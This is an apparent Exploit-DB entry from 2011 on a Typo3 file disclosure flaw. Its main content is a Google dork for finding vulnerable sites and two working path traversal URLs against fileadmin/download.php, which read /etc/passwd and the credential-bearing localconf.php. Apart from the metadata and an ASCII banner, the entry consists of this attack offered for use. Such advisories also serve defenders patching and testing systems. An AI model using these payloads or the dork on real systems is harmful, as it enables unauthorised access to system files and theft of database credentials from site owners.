Typo3 - File Disclosure

EDB-ID:

17905

CVE:



Author:

Number 7

Type:

webapps


Platform:

PHP

Date:

2011-09-29


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

 ________________________________________________________________________________________
|                           _              _                                              |
| ||\\      || ||       || | \\          // |  ____      ________           __________    |
| || \\     || ||       || | |\\        //| | |     \   |  ______|         |_______/ /    |
| ||  \\    || ||       || | | \\      // | | |  _   \  | |                       / /     |
| ||   \\   || ||       || | |  \\    //  | | | |_)  |  | |______    /\`'__\     / /      |
| ||    \\  || ||       || | |   \\  //   | | |  _  <   |  ______|   \ \ \/     / /       |
| ||     \\ || ||_______|| | |    \\//    | | | |_)  |  | |______     \ \_\    / /        |
| ||      \\|| |_________| |_|     \/     |_| |_____/   |________|     \/_/   /_/         |
|_________________________________________________________________________________________|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Exploit Title: [Typo3 File Disclosure]
# Google Dork: [inurl:"/fileadmin/download.php?Fichier_a_telecharger=*"]
# Date: [29/09/2011]
# Author: [Number 7]
# Contact :spam[-]tn[.]cs[@]live[.]fr
# Software Link: [http://typo3.org/]
# Tested on: [linux]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://127.0.0.1/fileadmin/download.php?Fichier_a_telecharger=../../../../../etc/passwd

http://localhost/path/fileadmin/download.php?Fichier_a_telecharger=../typo3conf/localconf.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Made In Tunisia // Kairouan // Mansoura City :D